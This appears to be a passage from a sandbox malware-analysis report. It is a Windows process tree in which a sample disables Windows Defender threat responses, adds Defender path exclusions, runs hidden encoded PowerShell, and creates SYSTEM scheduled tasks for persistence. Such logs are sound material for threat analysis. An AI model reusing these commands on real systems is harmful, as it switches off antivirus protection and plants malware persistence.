\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
    3⤵
    PID:6160
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6960
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9848
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        5⤵
        
        PID:10528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:11128
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10288
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10768
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10172
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:11104
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9900
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:11028
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5452
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10172
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:11036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10684
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10596
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5404
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2244
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:11084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZzJFgnUaheUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZzJFgnUaheUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efSuucJNImPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efSuucJNImPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gWMsjtYByovYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gWMsjtYByovYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\voItHROCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\voItHROCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WMmUhsrLoeNTYuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WMmUhsrLoeNTYuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MlEwZvbgpCGVQFZq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MlEwZvbgpCGVQFZq\" /t REG_DWORD /d 0 /reg:64;"
    3⤵
    PID:11192
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:32
        5⤵
        
        PID:9852
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:9956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6160
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:10552
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:10828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8488
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:10324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:10828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WMmUhsrLoeNTYuVB /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:11284
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WMmUhsrLoeNTYuVB /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:11312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:11340
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:11392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:11420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:11476
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MlEwZvbgpCGVQFZq /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:11520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MlEwZvbgpCGVQFZq /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:11556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gevpoSaMA" /SC once /ST 02:21:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:11620
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gevpoSaMA"
    3⤵
    PID:11732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gevpoSaMA"
    3⤵
    PID:13100
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IzaEPSfYdSgyWPrQW" /SC once /ST 00:32:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\dBslJMR.exe\" rc /ShGrdidwo 385118 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:13232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "IzaEPSfYdSgyWPrQW"
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 640
    3⤵
    - Program crash
    PID:13124
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:9732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:11784
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:15464
- C:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\dBslJMR.exe
  C:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\dBslJMR.exe rc /ShGrdidwo 385118 /S
  2⤵
  PID:13084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:13464
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:13572
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:13612
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:13628
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:13656
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:13696
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:13728
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:13788
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:13812
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:13828
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:13852
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:13868
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:13888
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:13920
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:13944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13988
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:6176
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bjPRdWxZxSSObMFEvg"
    3⤵
    PID:14052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
    3⤵
    PID:18844
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:19392
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:19440
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:15336
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        
        PID:21384
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\voItHROCU\UwvhSR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HsFIJVFBpaOiSlL" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:19124
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "HsFIJVFBpaOiSlL2" /F /xml "C:\Program Files (x86)\voItHROCU\syguLBN.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:16132
